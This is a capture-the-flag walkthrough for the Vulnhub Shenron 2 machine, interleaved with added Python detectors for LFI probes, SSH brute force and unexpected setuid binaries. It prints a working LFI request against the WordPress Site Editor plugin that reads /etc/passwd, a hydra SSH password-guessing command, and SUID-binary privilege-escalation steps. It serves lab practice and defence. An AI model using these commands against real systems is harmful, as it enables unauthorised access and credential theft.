Shenron 2 Vulnhub Walkthrough
Initial Enumeration
As usual, I started the initial enumeration by running a port scan using nmap, looking for open ports and running services.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.120
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 15:39 IST
Nmap scan report for 192.168.1.120
Host is up (0.014s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4a:47:6b:46:48:c5:d7:8f:30:92:5b:0c:2b:a4:74:ae (RSA)
| 256 b0:4e:d6:4c:c2:4e:15:05:c4:21:1d:69:7d:f2:dc:79 (ECDSA)
|_ 256 1b:c0:66:7a:65:68:9b:35:8c:63:d3:b9:d2:5b:f0:1c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Highlights by HTML5 UP
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.7
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: shenron-2 – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.12 seconds
We have an SSH server on port 22 and Apache web servers on ports 80 and 8080. Let's open our web browser and see what's running on port 80.
We have a template website running on port 80. I tried enumerating it with a gobuster scan to look for hidden files and directories, but I did not find anything interesting, so next let's enumerate port 8080.
Port 8080 is running a WordPress website, but the site does not load correctly at first because it references the hostname shenron. So I added shenron to my /etc/hosts file.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.120 shenron
Now we can visit http://shenron:8080 in our web browser.
Since this is a WordPress website, I ran wpscan to enumerate WordPress users and vulnerable plugins using the following command:
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ wpscan --url http://shenron:8080 --api-token $(cat /opt/wpscan-api) --enumerate
wpscan reported that a vulnerable plugin named Site Editor is installed.
Next, I used searchsploit to check Exploit-DB for a public exploit for this plugin.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ searchsploit Site Editor 1.1.1
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php/webapps/44340.txt
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We have a PoC for a Local File Inclusion exploit which can be used to read any file on the system. So first I tried reading the /etc/passwd file using the following command:
curl http://shenron:8080/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
The exploit worked and /etc/passwd revealed two users, shenron and jenny.
Next, I tried to brute force the SSH password for user jenny using hydra.
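From the defender's side, the request above leaves a very recognisable trace in the Apache access log: a hit on the plugin's ajax_shortcode_pattern.php endpoint whose ajax_path parameter is an absolute path or traverses upward. The following detector is an added example, not part of the original walkthrough; the log lines it scans are constructed, and the only page-specific detail it relies on is the endpoint path shown in the curl command.

```python
"""Flag Site Editor LFI probes in Apache combined-format access logs.

Added example (not from the original walkthrough). The sample log lines are
constructed; the endpoint name comes from the public PoC quoted above.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client, ident, user, [timestamp], "request line", status, size, ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Vulnerable endpoint of Site Editor 1.1.1 (from the PoC on this page).
VULN_ENDPOINT = "ajax_shortcode_pattern.php"


def is_lfi_probe(target: str) -> bool:
    """True when the request hits the vulnerable endpoint with an ajax_path
    that is absolute, climbs out of the plugin tree, or uses a URL wrapper."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_ENDPOINT):
        return False
    for value in parse_qs(parts.query).get("ajax_path", []):
        value = unquote(value)  # parse_qs decoded once; catch double encoding too
        if value.startswith("/") or ".." in value or "://" in value:
            return True
    return False


def scan_access_log(lines):
    """Return (source, timestamp, target) for every line that looks like an LFI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_lfi_probe(m.group("target")):
            hits.append((m.group("src"), m.group("ts"), m.group("target")))
    return hits


# Constructed sample: one ordinary page load, one probe mirroring the PoC
# request, one percent-encoded traversal to the same file.
SAMPLE_LOG = [
    '192.168.1.6 - - [14/May/2021:16:02:11 +0530] "GET /wp-login.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '192.168.1.6 - - [14/May/2021:16:05:43 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 200 1934 "-" "curl/7.74.0"',
    '192.168.1.6 - - [14/May/2021:16:05:50 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1934 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for src, ts, target in scan_access_log(SAMPLE_LOG):
        print(f"[LFI probe] {src} at {ts}: {target}")
```

The check is deliberately narrow to the one endpoint so it stays low-noise; the lasting fix is to update or remove the plugin, but a rule like this gives you the history of who probed it before the patch went in.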
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt shenron ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-14 17:09:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://shenron:22/
[STATUS] 147.00 tries/min, 147 tries in 00:01h, 14344253 to do in 1626:20h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344063 to do in 2128:12h, 16 active
[22][ssh] host: shenron login: jenny password: jenny
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-14 17:13:52
The username is jenny and the password is also jenny. We can use these credentials to log in via SSH.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ ssh jenny@shenron
jenny@shenron's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
30 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Apr 5 20:18:23 2021 from 192.168.1.6
jenny@shenron-2:~$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
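The hydra run above took several minutes at around 100 to 150 tries per minute, which is exactly the burst of "Failed password" lines in /var/log/auth.log that a host-based rule should catch. The detector below is an added example, not part of the original walkthrough: it counts failures per source address inside a sliding window and records whether the same source later logged in successfully. The auth.log lines are constructed to resemble that run, not copied from the box.

```python
"""Flag SSH password-guessing bursts in syslog-style auth.log lines.

Added example (not from the original walkthrough). Sample log lines are
constructed; the year is assumed because syslog timestamps omit it.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)
OK_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_ts(ts: str, year: int = 2021) -> datetime:
    """Syslog timestamps carry no year; assume one (constructed data uses 2021)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {src: {"peak": n, "users": set, "success": user|None}} for every
    source that produced at least `threshold` failures inside any window."""
    window = defaultdict(deque)  # src -> failure timestamps still inside the window
    state = defaultdict(lambda: {"peak": 0, "users": set(), "success": None})
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            src, t = m.group("src"), parse_ts(m.group("ts"))
            q = window[src]
            q.append(t)
            while (t - q[0]).total_seconds() > window_seconds:
                q.popleft()  # drop failures that fell out of the window
            st = state[src]
            st["peak"] = max(st["peak"], len(q))
            st["users"].add(m.group("user"))
            continue
        m = OK_RE.match(line)
        if m:
            # A success after a burst from the same source is the high-priority case.
            state[m.group("src")]["success"] = m.group("user")
    return {src: st for src, st in state.items() if st["peak"] >= threshold}


# Constructed sample: six rapid failures for jenny from one host, then a
# success from the same host, plus a single unrelated typo from another host.
SAMPLE_AUTH_LOG = [
    f"May 14 17:09:{48 + i:02d} shenron-2 sshd[{1401 + i}]: Failed password for jenny "
    f"from 192.168.1.6 port {40102 + i} ssh2"
    for i in range(6)
] + [
    "May 14 17:13:50 shenron-2 sshd[1442]: Accepted password for jenny from 192.168.1.6 port 40210 ssh2",
    "May 14 17:20:01 shenron-2 sshd[1500]: Failed password for shenron from 192.168.1.9 port 51000 ssh2",
]

if __name__ == "__main__":
    for src, st in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        tag = f"then SUCCEEDED as {st['success']}" if st["success"] else "no success seen"
        print(f"{src}: peak {st['peak']} failures/min against {sorted(st['users'])}, {tag}")
```

Tune threshold and window_seconds to the box's normal traffic; the real mitigation is to stop accepting passwords like jenny/jenny at all (key-based auth, or at least a lockout tool such as fail2ban in front of sshd).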
Privilege Escalation
Now that we have a shell on the box, our next task is to escalate our privileges to user shenron. For this, I first looked for all SUID binaries using the following command:
jenny@shenron-2:~$ find / -type f -perm -u=s 2>/dev/null
The /usr/bin/Execute binary seemed interesting to me, so I downloaded it to my local machine and disassembled it using Ghidra.
What this binary does is copy /bin/bash to /mnt/bash and set that copy up so it runs as user shenron. In short, after executing this binary we will be able to run commands as user shenron through /mnt/bash.
So first I ran /usr/bin/Execute by simply typing Execute and observed that a bash binary had been created in the /mnt directory. Next, I used /mnt/bash -p to spawn a shell (the -p flag tells bash to keep the effective UID instead of dropping it).
jenny@shenron-2:~$ Execute
jenny@shenron-2:~$ /mnt/bash -p
bash-5.0$ id
uid=1001(jenny) gid=1001(jenny) euid=1000(shenron) groups=1001(jenny)
bash-5.0$
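The whole escalation hinges on a setuid binary that is not part of a stock Ubuntu install. An auditor catches that with the same find / -perm -u=s idea the walkthrough uses, compared against a known-good list. The script below is an added example, not part of the original walkthrough: it walks a tree for setuid files and reports any that are missing from a baseline allowlist. The BASELINE set is a constructed illustration with a few binaries that are normally setuid on Ubuntu 20.04, not a complete baseline.

```python
"""Audit setuid binaries against an allowlist.

Added example (not from the original walkthrough). BASELINE is a constructed
illustration, not a full Ubuntu baseline; generate one from a clean image.
"""
import os
import stat

# Constructed baseline: a handful of binaries that are setuid on a stock Ubuntu 20.04.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount",
}

PSEUDO_FS = ("/proc", "/sys", "/dev")


def find_setuid(root="/"):
    """Yield absolute paths of regular files under root with the setuid bit set,
    mirroring `find / -type f -perm -u=s 2>/dev/null`."""
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune pseudo-filesystems in place so os.walk does not descend into them.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entry, same as find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path


def unexpected_setuid(paths, baseline=BASELINE):
    """Return (path, owner_uid, mode) for each setuid file not in the baseline."""
    report = []
    for p in sorted(set(paths) - set(baseline)):
        try:
            st = os.lstat(p)
            report.append((p, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
        except OSError:
            report.append((p, None, None))
    return report


if __name__ == "__main__":
    # On the walkthrough's box this would list /usr/bin/Execute (and, once it
    # has been run, /mnt/bash) as unexpected.
    for path, uid, mode in unexpected_setuid(find_setuid("/")):
        print(f"unexpected setuid: {path} owner uid={uid} mode={mode}")
```

Owner UID matters in the report: a setuid file owned by an ordinary user such as shenron (uid 1000) is as much a finding as one owned by root, since it hands that user's identity to anyone who can execute it.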
Now you can see the euid has changed to 1000, which belongs to user shenron. Therefore we can now execute any command as user shenron, and we can also read our first flag in the /home/shenron/Desktop directory.
bash-5.0$ cd /home/shenron/Desktop
bash-5.0$ ls -lah
total 16K
drwx------ 2 shenron shenron 4.0K Apr 5 19:13 .
drwxr-xr-x 16 shenron shenron 4.0K Apr 6 00:43 ..
-rwx------ 1 shenron shenron 32 Apr 5 19:13 local.txt
-rwx------ 1 shenron shenron 97 Apr 5 19:10 .pass
bash-5.0$ cat local.txt
40252f8ffc3932fd2b5ae4995defb92
Root Shell
In the same directory as the first flag there is also a hidden file named .pass. Reading it gives us a base32-encoded string.
bash-5.0$ cat .pass
KNUEK3SSN5HFG2CFNZJG6TSTNBCW4UTPJZJWQRLOKJXU4U3IIVXFE32OIBJWQRLOKJXU4I2TNBCW4UTPJZIGCU3TK5XVEZAK
After decoding it, we get the password for user shenron.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ echo KNUEK3SSN5HFG2CFNZJG6TSTNBCW4UTPJZJWQRLOKJXU4U3IIVXFE32OIBJWQRLOKJXU4I2TNBCW4UTPJZIGCU3TK5XVEZAK | base32 -d
ShEnRoNShEnRoNShEnRoNShEnRoNShEnRoN@ShEnRoN#ShEnRoNPaSsWoRd
We have the password for user shenron, so we can switch to that user with the su shenron command.
Next, I checked whether user shenron can run any commands as root with sudo -l, and found that shenron can run all commands as root!
shenron@shenron-2:~/Desktop$ sudo -l
[sudo] password for shenron:
Matching Defaults entries for shenron on shenron-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shenron may run the following commands on shenron-2:
(ALL : ALL) ALL
Now we can simply use sudo su to get a root shell and read our final flag in the root directory.
shenron@shenron-2:~/Desktop$ sudo su
root@shenron-2:/home/shenron/Desktop# cd /root
root@shenron-2:~# cat root.txt
(ASCII-art banner)
Your Root Flag Is Here :- a89604e285437f789ff278d2239aea02
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Christi du Toit.